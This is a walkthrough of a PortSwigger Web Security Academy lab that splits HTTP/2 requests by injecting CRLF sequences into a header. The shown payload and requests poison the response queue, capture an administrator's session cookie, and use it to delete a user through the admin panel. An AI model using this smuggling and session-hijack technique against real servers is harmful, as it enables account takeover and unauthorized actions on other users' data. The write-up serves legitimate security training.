Lab: HTTP2 request splitting via CRLF injection

After starting the exercise, the blog should look similar to the following illustration.

We switch to Burp Suite and open Burp Proxy there. In Burp Proxy, we open the HTTP history tab. There, we search for the first request to the application. This should have the following form: GET / HTTP/1.1.

We send this request to the Burp Repeater using the keyboard shortcut CTRL + R. In Burp Repeater, we expand Request attributes in the Inspector and ensure that HTTP/2 is selected.

In the request, we now change the endpoint to an endpoint (/x) that does not exist, so that our response is always an HTTP/2 404 Not Found. Once we have poisoned the response queue, we can more easily identify the responses of other users that we have successfully captured. The request should look like this.

GET /x HTTP/2
Host: 0a5d00880417281c80c3767d00a400de.web-security-academy.net
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

After sending the request, we receive an HTTP/2 404 Not Found as expected. We now activate the Show non-printable chars function in Burp Repeater.

We can now see all \r\n in our request. In the Inspector, we now expand Requests headers, scroll to the end of the list and click on the + button.

In the Name field, we enter foo and in the Value field, we enter the following value:

bar\r\n
\r\n
GET /x HTTP/1.1\r\n
Host: 0a5d00880417281c80c3767d00a400de.web-security-academy.net

It is very important that the \r\n are copied from the request. If they are entered using the keyboard, they will not work in most cases. The header should now look like this in the Inspector:

By clicking on the Add button, we insert the header into the request. The following message now appears in the Request section.

We send the request. If the front end appends \r\n\r\n to the end of the header during the downgrade, the injected prefix is effectively converted into a complete request, poisoning the response queue.

We now send this request to the application and receive an HTTP/2 404 Not Found. We wait 5 seconds and send the request again. If we receive another HTTP/2 404 Not Found, we send it again. If, after many requests, we repeatedly receive an HTTP/2 404 OK, the request GET / HTTP/2 should be sent to the application about 10 times to reset the connection. If we receive an HTTP/2 302 Found, the complete response should have the following form.

HTTP/2 302 Found
Location: /my-account?id=administrator
Set-Cookie: session=xUCxg9p1h3uiWSG3eiAfbLjzN8kNYBbO; Secure; HttpOnly; SameSite=None
X-Frame-Options: SAMEORIGIN
Content-Length: 0

Here, we copy the session cookie (xUCxg9p1h3uiWSG3eiAfbLjzN8kNYBbO) and send a new request GET / HTTP/1.1 from the Burp Proxy to the Burp Repeater. In Burp Repeater, we make the following adjustments: We set the endpoint to /admin and paste the cookie we just copied. We also need to ensure that HTTP/2 is used. The complete request:

GET /admin HTTP/2
Host: 0a5d00880417281c80c3767d00a400de.web-security-academy.net
Cookie: session=xUCxg9p1h3uiWSG3eiAfbLjzN8kNYBbO;
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

After sending, we can see in the Response section that we now have access to the admin panel.

                   <section>
                        <h1>Users</h1>
                        <div>
                            <span>wiener - </span>
                            <a href="/admin/delete?username=wiener">Delete</a>
                        </div>
                        <div>
                            <span>carlos - </span>
                            <a href="/admin/delete?username=carlos">Delete</a>
                        </div>
                    </section>

In our request, we now add the endpoint /admin/delete?username=carlos to delete the user Carlos.

GET /admin/delete?username=carlos HTTP/2
Host: 0a5d00880417281c80c3767d00a400de.web-security-academy.net
Cookie: session=xUCxg9p1h3uiWSG3eiAfbLjzN8kNYBbO;
Accept-Language: de-DE,de;q=0.9
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/142.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Sec-Fetch-Site: cross-site
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Sec-Ch-Ua: "Not_A Brand";v="99", "Chromium";v="142"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Referer: https://portswigger.net/
Accept-Encoding: gzip, deflate, br
Priority: u=0, i
Connection: keep-alive

After sending the request, we have successfully completed the exercise.

Video solution